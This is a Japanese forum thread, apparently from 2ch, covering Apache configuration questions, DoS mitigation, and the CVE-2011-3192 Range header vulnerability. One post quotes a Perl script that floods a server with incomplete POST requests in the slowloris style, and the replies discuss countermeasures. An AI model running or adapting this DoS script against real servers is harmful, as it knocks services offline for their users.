Apache関連 Part11

**名無しさん＠お腹いっぱい。** · 2008/09/30(火) 08:11:00

HTTP ServerのApacheに関する話題を扱うスレッドです。
http://httpd.apache.org/

●インストール済みApacheの詳細情報の調べ方
httpd -h　簡易ヘルプ
httpd -v　バージョン情報
httpd -V　コンパイル条件など詳細な情報
httpd -l　静的リンクされたモジュール一覧
httpd -M　現在の設定ファイルで読み込まれるモジュール(2.2以降)

●公式マニュアル
http://httpd.apache.org/docs/1.3/ Apache 1.3
http://httpd.apache.org/docs/2.0/ Apache 2.0
http://httpd.apache.org/docs/2.2/ Apache 2.2

●ディレクティブ一覧
http://httpd.apache.org/docs/1.3/mod/directives.html
http://httpd.apache.org/docs/2.0/mod/quickreference.html
http://httpd.apache.org/docs/2.2/mod/quickreference.html

前スレッド
Apache関連 Part10
http://pc11.2ch.net/test/read.cgi/unix/1179627714/

**名無しさん＠お腹いっぱい。** · 2011/06/06(月) 20:28:52.63

でびあんから再インストールすれば良いよ。

**名無しさん＠お腹いっぱい。** · 2011/06/06(月) 20:41:33.54

>>482
1から設定しなおすのが大変なので他にないでしょうか?

**名無しさん＠お腹いっぱい。** · 2011/06/06(月) 21:12:18.11

あるだろうけど、適切な場所で質問しなけりゃ解は得られないだろうね。

**名無しさん＠お腹いっぱい。** · 2011/06/06(月) 23:00:39.10

たぶん479=481

**名無しさん＠お腹いっぱい。** · 2011/06/08(水) 21:01:28.15

apacheとmod_wsgiでアプリケーションを動かしています。
ログイン情報などをsessionで保存しているのですが、これを一度クリアすることってできますか？

**名無しさん＠お腹いっぱい。** · 2011/06/10(金) 06:07:56.31

>>481
その an error code がなんなのかわからないと答えようがないと思うが。

**名無しさん＠お腹いっぱい。** · 2011/06/10(金) 11:27:48.64

Debian 限定の話は Debian スレへ。

**名無しさん＠お腹いっぱい。** · 2011/06/16(木) 04:07:49.48

スレ違いかもしれませんがmod_Jkのフェイルオーバについて知っている方がいたら教えてください。
Webサーバ2台、APサーバ2台で構成しており、workers.propertiesは
以下のものがWebサーバ2台ともに入っています。

===
worker.list=wlb

worker.w1.type=ajp13
worker.w1.host=192.168.0.201
worker.w1.port=8009
worker.w1.redirect=w2

worker.w2.type=ajp13
worker.w2.host=192.168.0.202
worker.w2.port=8009
worker.w2.activation=disable

worker.wlb.type=lb
worker.wlb.balance_workers=w1,w2
worker.wlb.sticky_session=True
===

w1がダウンし続けた場合、mod_jkは定期的にw1にリクエストを送り、失敗したのちまたw2にフェイルオーバするという仕様になっているのでしょうか？
recovery_optionの設定も見たのですが、デフォルトが0ということでこの場合にどのような動作になるのかがわかりません。

環境は以下の通りです。
Fedora12
Apache2.2
mod_jk1.2.30

よろしくお願いいたします。

**名無しさん＠お腹いっぱい。** · 2011/06/22(水) 22:02:32.13

mod_rpaf がダウンロードできなくなってるんだけど、
http://stderr.net/apache/rpaf/download/mod_rpaf-0.6.tar.gz
誰かミラー知ってる人いませんか？

**名無しさん＠お腹いっぱい。** · 2011/06/24(金) 18:13:00.70

見つからないね。
違ってると思うけど、mod_extract_forwarded ではダメ？・・・だよね

**名無しさん＠お腹いっぱい。** · 2011/06/24(金) 18:50:42.93

みっけ
ftp://ftp.freebsd.org/pub/FreeBSD/ports/distfiles/mod_rpaf-0.6.tar.gz

**名無しさん＠お腹いっぱい。** · 2011/06/25(土) 10:20:58.37

おー　頭いいな

**名無しさん＠お腹いっぱい。** · 2011/06/25(土) 10:49:30.95

検索してたら ports の Makefile が引っかかったから、
どっかにあると思ってたけど 492 さんには本当に感謝。
自分も昨日から急遽 source が必要になったから焦ってた。

**名無しさん＠お腹いっぱい。** · 2011/07/04(月) 18:37:48.03

mod_rewriteの設定数に上限はありますでしょうか
RewriteCond %{DOCUMENT_ROOT}/%{REQUEST_FILENAME} !-d
RewriteCond %{DOCUMENT_ROOT}/%{REQUEST_FILENAME} !-f
RewriteRule ^/item/(.*)\.html /item/detail.php?id=$1 [P,QSA,NE,L]

このような設定がサイトごとに３つあり、１０サイト稼働しています
サイトを増やしたところ$1が空でした
ログを見ると条件にマッチしてましたが、$1が空になってしまうのです
他のサイトを一時的に消したところ、なぜか期待通りの動きになりました
apacheのバージョンは2.2.9です
何かお分かりになりますでしょうか

**名無しさん＠お腹いっぱい。** · 2011/07/04(月) 19:33:55.08

mod_rewriteってのはそれ以外の手段がまったくない場合にかぎって
しかたなく使うのが許されるウンコであって、
それを通常運用としてしまうのはウンコ以下。
ウンコの限界を極めるウンコ仕事をするよりも、
ウンコを使わないで済むようにスクリプトの方を修正した方がいい。

具体的には、
AliasMatch ^/item/.*\.html /item/detail.php
として、呼ばれたURLから.*の部分を拾うようdetail.phpを書き換える。

**名無しさん＠お腹いっぱい。** · 2011/07/09(土) 01:11:49.14

Apache2.2を使って、ホワイトリスト型のフォワードプロキシ
(事前に指定したサイトしかアクセスできないように設定)
を作ろうとしているのですが、設定が上手くいかないです。

下記、例としてyahooおよびgoogleのみアクセスを許可して、
それ以外のサイトをアクセス拒否させる目的で設定しましたが、
一番上のアクセス拒否の設定が優先されてしまうため、
全てのサイトへのアクセスが拒否されてしまいます。

●現在の設定例(一部抜粋)
<Proxy *>
Order deny,allow
Deny from all
</Proxy>

<Proxy http://www.yahoo.co.jp/*>;
Order allow,deny
Allow from all
</Proxy>

<Proxy http://www.google.co.jp/*>;
Order allow,deny
Allow from all
</Proxy>

上記、あて先がyahooとgoogleのみアクセス許可して、
それ以外のサイトへのアクセスを拒否したいのですが、
Apache2.2でそれを行う方法はあるのでしょうか？
（configの記載順による優先順位の問題でしょうか？）

上記、わかる方がいれば、教えていただけると助かります。
よろしくお願いいたします。

**名無しさん＠お腹いっぱい。** · 2011/07/23(土) 18:08:53.11

ApacheのMPM改造したいんだけど。具体的には、バーチャルホストごとに帯域制御をしたい
参考になるサイトとかって無いかな。もしくは、やったことある人いる?

**名無しさん＠お腹いっぱい。** · 2011/07/24(日) 00:56:01.27

ApacheってDos攻撃対策大丈夫なの?

**名無しさん＠お腹いっぱい。** · 2011/07/24(日) 10:34:15.19

というと?

**名無しさん＠お腹いっぱい。** · 2011/07/24(日) 11:36:01.87

Apache自身にやらせたいならmod-dosdetector

**名無しさん＠お腹いっぱい。** · 2011/07/24(日) 12:44:00.71

ソースコード見る限り、mod_evasiveとかmod_dosdetectorとかだと弱いんだよ。
相手からのリクエストを読んでから、遮断するから。

相手が接続だけして、何もデータを送ってこないと接続数がふくれあがるはず。実験してないけど
しかも、遮断する前にスレッドなりプロセスなりを割り当てるから、リソースが無駄。

本来は、acceptした時点でIPアドレスがわかるわけだから、それを振り分ける前に遮断するべき

**名無しさん＠お腹いっぱい。** · 2011/07/24(日) 13:08:54.97

それはファイヤーウォールの仕事では

**名無しさん＠お腹いっぱい。** · 2011/07/24(日) 13:29:08.34

その手があったか。ありがとう

**名無しさん＠お腹いっぱい。** · 2011/07/24(日) 14:18:19.69

http://httpd.apache.org/docs/trunk/misc/security_tips.html#dos

**名無しさん＠お腹いっぱい。** · 2011/07/24(日) 18:05:28.86

なんか無知な学生がレポート書きの手伝いを求めてるようなふいんきだな

**名無しさん＠お腹いっぱい。** · 2011/07/24(日) 20:34:50.64

>>506
そんな感じですね。

ぼんやりしたやり取りがたまらないｗ

**名無しさん＠お腹いっぱい。** · 2011/07/25(月) 00:12:09.07

うちは帯域制御はmod_cband
DoS対策はmod_security
CentOS5.x/Apache2.2.xで安定して使ってるよ

**名無しさん＠お腹いっぱい。** · 2011/07/25(月) 00:22:08.76

たまに刺さってmod_cbandが発狂するので、一時間に一回再起動させて運用してるよ。。
なんか帯域カウンターが戻らなくて溜まってしまう感じ

**名無しさん＠お腹いっぱい。** · 2011/07/25(月) 01:21:57.68

>>509
バグ報告すれば?それかソースコード自分で見れば?
モジュール単体なら、そんなに量多くないから分かるはず

>>505
http://d.hatena.ne.jp/dayflower/20081029/1225266220
ここを参考mpmのソース見ると、ヘッダーを読み込んだあとにしかモジュールのフックをかけられない構造になってる。
だから、mpm改造しちゃえばできるんだけど。モジュール化の意味合いが薄まるから汚いかなって

**名無しさん＠お腹いっぱい。** · 2011/07/25(月) 01:24:03.92

>>505
不完全なのは知ってのことなのか。世界の誰か頑張れよ
俺がもっといいmpm作ろうかな。性能がよければ有名になれるかなwww

**名無しさん＠お腹いっぱい。** · 2011/07/25(月) 02:28:49.74

分離してうまく作れるんじゃないかとあれこれ試行錯誤するが
結局のところモジュール本体に改造を入れることって多いよね。。。

**名無しさん＠お腹いっぱい。** · 2011/07/25(月) 03:15:04.58

>>511
だったら作って有名になってみればいいじゃんｗ

**509** · 2011/07/25(月) 10:37:52.60

ソースは追いかけて何処の変数がインクリメントしっぱなしかは確認したけど
複数プロセスで共有してる奴で、どっかで突然死するプロセスが居ればさもありなんて感じ
発生頻度も週一くらいで、何台かで回してるサービスだし面倒

**名無しさん＠お腹いっぱい。** · 2011/07/25(月) 11:56:14.21

2.4 に mod_ratelimit ってのが入るので、先取りしてバージョン上げちゃえ。

**名無しさん＠お腹いっぱい。** · 2011/08/04(木) 07:37:37.77

449 忍法帖【Lv=40,xxxPT】 ◆8huU.uGZBA sage 2011/08/03(水) 15:02:01.85 ID:49.133.48.168 0
サーバへにリクエストが来た時、リクエストを受け取るまでhttpdは待っているわけだ
しかしcontentslength分だけ受け取りたいけど待てど暮らせど送ってこないから
httpd.confのtimeoutするまでそのhttpdプロセスがブロックされるんだな
そしてそれがたーくさんたまる、売り切れまで溜まる
売り切れたらそれ以降のhttpの要求は受け付けなくなる

攻撃がやんだらブロックされているhttpdは順次timeoutで開放され
だんだんいつもの状態に近づく

こうなんじゃないかな?

456 ◆IOT1IIO1ILUU-さる♪ sage 2011/08/03(水) 15:06:18.97 ID:219.106.108.87 0
>>449
大体はそんな感じです。
少し違うのは、Content-Lengthは関係ありません。
中途半端なHTTPリクエストであってもApacheが律儀にTCPのタイムアウトまでリソースを確保して待ってしまうのが原因なので、
それこそTCPで何か少しでもデータを送ってやれば、HTTPリクエストとして完全に破綻していてもApacheは落ちます。
なのでHTTPのヘッダに着目して対策するのは無理です。

**名無しさん＠お腹いっぱい。** · 2011/08/04(木) 07:39:45.57

こんな感じなんだけどどうやったら対策できる？
攻撃元のスクリプトは以下

433 名無しさん＠お腹いっぱい。 sage 2011/08/03(水) 14:51:01.84 ID:81.94.203.180 0
スクリプト自体はマルチスレッドでBBS.CGIを叩くだけなんだよな
こんな感じで

my $ref = sub{
while(){
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname( 'tcp'));
connect(SOCK, sockaddr_in("80", $ipaddr));
select(SOCK);
$|=1;
select(STDOUT);

print SOCK "POST /test/bbs.cgi HTTP/1.1\r\n";
print SOCK "Accept: */*\r\n";
print SOCK "Referer: http://$sv" . "/news/\r\n";
print SOCK "Accept-Language: ja,en;q=0.5\r\n";
print SOCK "Content-Type: application/x-www-form-urlencoded\r\n";
print SOCK "Accept-Encoding: gzip, deflate\r\n";
print SOCK "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)\r\n";
print SOCK "Host: $sv\r\n";
print SOCK "Content-Length: 1\r\n";
print SOCK "Connection: Keep-Alive\r\n";
print SOCK "\r\n";
close(SOCK);

threads->yield();
}
};

**名無しさん＠お腹いっぱい。** · 2011/08/04(木) 10:17:16.26

slowloris 対策なら RequestReadTimeout で。

**名無しさん＠お腹いっぱい。** · 2011/08/04(木) 10:38:02.85

>>518
ありがとう

**名無しさん＠お腹いっぱい。** · 2011/08/07(日) 14:40:43.49

ブラウザでリクエストヘッダーに
Keep-Aliveの時間を指定した場合、どういう時間を指し示すのでしょうか？
Wikipediaを見ていてふと疑問に思いました。

Keepalive time is the duration between two keepalive transmissions in idle condition. TCP keepalive period is required to be configurable and by default is set to no less than 2 hours.
Keepalive interval is the duration between two successive keepalive retransmissions, if acknowledgement to the previous keepalive transmission is not received.

http://en.wikipedia.org/wiki/Keepalive

**名無しさん＠お腹いっぱい。** · 2011/08/07(日) 15:23:57.31

TCP keepaliveの説明を引用してくるバカがおる

**名無しさん＠お腹いっぱい。** · 2011/08/07(日) 17:14:40.13

ﾌｲﾀｗ

**名無しさん＠お腹いっぱい。** · 2011/08/09(火) 04:00:06.70

wgetで直アクセスすると404 Not Foundを返して来て、
telnetでアクセス(HEAD /some/foo/hoge.jpg HTTP/1.0)しても404を返してくるサーバがあります。
それなのに、chromeでアクセスすると画像が表示されます。

これってどういう設定なのでしょうか？
telnetやwgetでchromeと同じ結果を得るためには、どうアクセスするべきなのでしょうか？

**509** · 2011/08/09(火) 10:40:40.07

UAとかホスト名指定とかじゃあ？

**名無しさん＠お腹いっぱい。** · 2011/08/10(水) 03:24:02.30

Referer の制限かなあ。
Chrome で見えるって言うのは、画像の URI を直接指定して?
こちらの紳士達が詳しいかも↓
http://hibari.2ch.net/test/read.cgi/unix/1305422004/l50

**名無しさん＠お腹いっぱい。** · 2011/08/10(水) 22:09:42.74

ホスト名やリファラによる制限はブラウザと関係ないし
ユーザエージェント制限の可能性があるけどその場合は404じゃんくて403だよね

**名無しさん＠お腹いっぱい。** · 2011/08/10(水) 23:46:51.84

何を返してくるかは相手次第だろうに403と決めてかかるとかｗ

**名無しさん＠お腹いっぱい。** · 2011/08/11(木) 00:04:53.56

403を404エラーとして返すサーバならそうだろうけど、わざわざそうする理由があるサーバということだよね？

**名無しさん＠お腹いっぱい。** · 2011/08/11(木) 10:41:31.12

ErrorDocumentを指定していてその先で404にすげ替えるとか。

**名無しさん＠お腹いっぱい。** · 2011/08/11(木) 12:15:38.68

>>528
軽い気持ちで404返してるかも知れないのにお前は何を言ってるんだ？

**名無しさん＠お腹いっぱい。** · 2011/08/11(木) 13:36:22.24

528は恥ずかしくてつい恥の上塗りでしょ

**名無しさん＠お腹いっぱい。** · 2011/08/13(土) 04:50:07.44

fc2とかリファラで404返してくるじゃん

**名無しさん＠お腹いっぱい。** · 2011/08/18(木) 10:42:17.44

違うドメイン名へのアクセスをエラーにしたいんだけど
どう設定したらいいかな。

chinkoサーバに http://unko/ というアクセスがあったとき
200でなく404とか適切なエラーを返したい

**名無しさん＠お腹いっぱい。** · 2011/08/18(木) 10:43:51.16

VirtualHost

**名無しさん＠お腹いっぱい。** · 2011/08/18(木) 18:25:43.83

Hostヘッダーを見てはじけばいい

**名無しさん＠お腹いっぱい。** · 2011/08/25(木) 21:34:02.90

CVE-2011-3192
Range header DoS vulnerability Apache HTTPD 1.3/2.x

1) Use SetEnvIf or mod_rewrite to detect a large number of ranges and then
either ignore the Range: header or reject the request.

Option 1: (Apache 2.0 and 2.2)

# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range

# optional logging.
CustomLog logs/range-CVE-2011-3192.log common env=bad-range

対策してね。

**名無しさん＠お腹いっぱい。** · 2011/08/25(木) 22:01:49.96

【ニュー速ハッカー部】Apacheの脆弱性を突く「Apache Killer」　お前らのサーバの危険が危ない
http://hatsukari.2ch.net/test/read.cgi/news/1314272986/

**名無しさん＠お腹いっぱい。** · 2011/08/25(木) 23:31:09.77

赤帽パッチまだー( ﾟдﾟ)
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2011-3192

**名無しさん＠お腹いっぱい。** · 2011/08/26(金) 10:04:21.25

お前らどころか2chが盛大に落とされたわけだが、他のサイトでは対策してあんのかな

**名無しさん＠お腹いっぱい。** · 2011/08/26(金) 11:57:53.46

2chが盛大に落ちたんだから他の奴等はこれはヤバいwと気づいて対策するだろうよ。
問題は2chが落ちた原因が ApacheKillerだと認識されてるかどうかだが。

2ch来てない奴には通用しないかも。ニュース系サイトでの取扱い鈍いし。

**名無しさん＠お腹いっぱい。** · 2011/08/26(金) 21:29:06.82

>>536
それ対策なってねーぞｗ

**名無しさん＠お腹いっぱい。** · 2011/08/26(金) 22:36:22.12

Apache HTTPD Security ADVISORY
==============================
UPDATE 2

なんてのを用意中ぽいな
workaroundも修正されとるでぇ
ttp://mail-archives.apache.org/mod_mbox/httpd-dev/201108.mbox/%3CF0328A02-507F-42F6-A99E-EC2F30733BB7@bbc.co.uk%3E

**名無しさん＠お腹いっぱい。** · 2011/08/26(金) 23:00:52.14

既にannounceに流れてた
http://mail-archives.apache.org/mod_mbox/httpd-announce/201108.mbox/%3C20110826103531.998348F82@minotaur.apache.org%3E

ということで
>>536
はネタが古い

**名無しさん＠お腹いっぱい。** · 2011/08/26(金) 23:50:02.78

WAは検証して使えなかったから、ソース待ち
お前らちゃんと検証しろよな

**名無しさん＠お腹いっぱい。** · 2011/08/27(土) 09:17:11.02

>>543
あんまし困らないけどenv=bad-req-rangeの定義がないような気がする・・・。
SetEnvIf漏れ？

**名無しさん＠お腹いっぱい。** · 2011/08/27(土) 09:59:14.61

httpd-devはヲチっとけ

**名無しさん＠お腹いっぱい。** · 2011/08/29(月) 18:31:37.90

LoadModuleにある、mod_authxxxxxっていっぱいあるけど、
「使ってないぞコレ」と思ったらコメントアウトしてＯＫ？

なんか気を付けることがあったらおしえてください。

**名無しさん＠お腹いっぱい。** · 2011/08/29(月) 18:50:36.98

まずはドキュメント読みなよ。

**名無しさん＠お腹いっぱい。** · 2011/08/29(月) 19:00:03.08

>548
一応Apacheのところを読んではいるんですが、
「××する機能」とはあるんですが、止めたら何が問題か？は書いてないですよね？

ノウハウっぽいところがあるのかな？と。

**名無しさん＠お腹いっぱい。** · 2011/08/29(月) 19:29:15.16

「××する機能」がいらないなら止めていいんじゃね。

**名無しさん＠お腹いっぱい。** · 2011/08/29(月) 19:43:26.29

全部コメントアウトして、動くようになるまで追加する。

**名無しさん＠お腹いっぱい。** · 2011/08/29(月) 19:46:34.21

モジュールのページを見ると
そのモジュールが提供するディレクティブ一覧が載ってる。
そのディレクティブを使ってなければたいていいらない。

**名無しさん＠お腹いっぱい。** · 2011/08/29(月) 21:15:45.17

>550-552
大体そんな方針で良いみたいですね

ある程度最初からonにしてあるのは利便性のタメかな？

**名無しさん＠お腹いっぱい。** · 2011/08/29(月) 23:02:41.02

ある程度というより、configure時にsharedで有効にしたものは全部onになってるぞ

**名無しさん＠お腹いっぱい。** · 2011/08/30(火) 11:10:26.12

apacheを使い始めたばかりの者ですが、よく分からないことがあります。

apacheのドキュメントルート直下に/cgi-bin/という名前のフォルダを作ると、
Forbiddenとなってしまい、それ以下のファイルを参照することが出来なくなってしまいます。
直下に/cgi-bin/を配置するのではなく、/test/cgi-bin/というようにワンクッション置けば参照できるようになります。
これは正常な動作なのでしょうか？
また、これが正常な動作である場合、ドキュメントルート直下に/cgi-bin/というフォルダを置いても
Forbiddenにならないようにするにはどのように設定を変更すればよいのでしょうか？

教えていただきたいです。

**名無しさん＠お腹いっぱい。** · 2011/08/30(火) 11:20:54.28

>>555
っ ScriptAlias

**555** · 2011/08/30(火) 12:28:42.47

>>556
ありがとうございます。
つまり、ドキュメントルート直下に/cgi-bin/を作成すると、ScriptAliasの設定と競合する形になってしまうってことですかね？
それでScriptAliasの設定が優先されるので、自分で作成した/cgi-bin/はForbiddenになってしまうと。

あと、単純な質問になってしまいますが、そもそもScriptAliasの設定したディレクトリにcgiを置くメリットってなんなんでしょうか？
cgi自体をダウンロードされたり表示されないようにするためだと記してあるサイトが多いようですが、
ScriptAliasに置かなくてもcgiにアクセスしたら、結局はプログラムが実行された後の結果しか与えられないと考えていたのですが。
ScriptAliasで設定したディレクトリ以外に置かれたcgiというのは、その中身が簡単にみられてしまったりするのでしょうか？

**名無しさん＠お腹いっぱい。** · 2011/08/30(火) 13:28:23.86

>>557
> つまり、ドキュメントルート直下に/cgi-bin/を作成すると、ScriptAliasの設定と競合する形になってしまうってことですかね？
ScriptAlias の指定が優先されてドキュメントルートの方の /cgi-bin/ は参照されない。

> あと、単純な質問になってしまいますが、そもそもScriptAliasの設定したディレクトリにcgiを置くメリットってなんなんでしょうか？
一ヶ所に集めておくと管理しやすい。
あやしいプログラムをユーザに勝手に置かれるのを防ぐ。

**555** · 2011/08/30(火) 14:09:15.85

>>558
解説ありがとうございます。

>あやしいプログラムをユーザに勝手に置かれるのを防ぐ。

これはつまりセキュリティの事を考慮すると、cgiはScriptAliasで設定したディレクトリに置いた方がよいということですよね。

この質問とは別のことになりますが、例えばページの管理者だけが使用することを目的としたcgiを作成した場合、
ドキュメントルート下にhtaccessの設定でBasic認証を有効にしたディレクトリにそのcgiを置くよりも、
ScriptAliasで設定したディレクトリにそのcgiを置いた方がセキュリティ面では良いということになるのでしょうか？

**名無しさん＠お腹いっぱい。** · 2011/08/30(火) 14:21:51.67

>>559
管理しきれるならどこに置いてもいいんじゃね。

あと、自分と同じディレクトリにデータファイルを作るようなプログラムがあった場合に
ScriptAlias 以下ならそのファイルを覗かれることがない、っていう利点もあるにはある。
副次的な効果だけど。
そんなプログラム作る方が悪いんだけど。

**555** · 2011/08/30(火) 14:34:43.13

>>560

とりあえず、初心者なのでScriptAliasで設定したディレクトリにcgiを集めることにしてみます。

お答えくださってありがとうございました。

**名無しさん＠お腹いっぱい。** · 2011/08/30(火) 14:46:50.14

http://httpd.apache.org/docs/2.2/misc/security_tips.html#nsaliasedcgi

**名無しさん＠お腹いっぱい。** · 2011/08/31(水) 10:38:02.43

2.2.20

**名無しさん＠お腹いっぱい。** · 2011/08/31(水) 11:02:44.56

早速上げたった。
テストは面倒だからしてない(･∀･)y‐┛~~

**名無しさん＠お腹いっぱい。** · 2011/08/31(水) 14:52:22.61

1.3系使ってる人はどうするの？
まだまだ沢山いると思うんだけど...

**名無しさん＠お腹いっぱい。** · 2011/08/31(水) 15:02:26.97

いいかげん 2.x に乗り換えれ。

**名無しさん＠お腹いっぱい。** · 2011/08/31(水) 15:06:53.44

自分のサーバーなら2.2系使ってるんだけどね...
仕事先のだとなかなか...

**名無しさん＠お腹いっぱい。** · 2011/08/31(水) 15:07:58.37

1.3系のパッチの予定はないのかな？

**名無しさん＠お腹いっぱい。** · 2011/08/31(水) 17:54:52.56

ないよ。

**名無しさん＠お腹いっぱい。** · 2011/08/31(水) 23:31:26.50

赤帽バッチまだー
>>538

**名無しさん＠お腹いっぱい。** · 2011/09/01(木) 03:47:35.52

2.2.20速いぞ

**名無しさん＠お腹いっぱい。** · 2011/09/01(木) 10:45:44.80

>>570
来たよ。
http://rhn.redhat.com/errata/RHSA-2011-1245.html

**名無しさん＠お腹いっぱい。** · 2011/09/01(木) 11:18:40.39

2.0系のパッチの予定はないのかな？

**名無しさん＠お腹いっぱい。** · 2011/09/01(木) 11:40:51.42

自分でバックポートしれ　そして配布しれ

**名無しさん＠お腹いっぱい。** · 2011/09/01(木) 12:11:51.87

>>573
RHEL4.xのパッチをパクればOK

**名無しさん＠お腹いっぱい。** · 2011/09/01(木) 12:29:35.32

2.0.x は出す
1.3.x は出さないと言ってた気がする

**名無しさん＠お腹いっぱい。** · 2011/09/01(木) 12:39:32.05

早い対応、めでたし。
今回の脆弱性で実際に攻撃を受けたってサイトはあるの？

**名無しさん＠お腹いっぱい。** · 2011/09/01(木) 13:12:44.86

>>577
2ch とか?

**名無しさん＠お腹いっぱい。** · 2011/09/01(木) 13:15:49.58

>>574 >>575
非公式な対応はいろいろあるけど、
公式に出ないのかな、と思って。

**名無しさん＠お腹いっぱい。** · 2011/09/01(木) 14:41:38.01

http://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/httpd-2.2.3-53.el5_7.1.src.rpm

**名無しさん＠お腹いっぱい。** · 2011/09/01(木) 14:43:16.08

>>580
とつぜんどうしたの。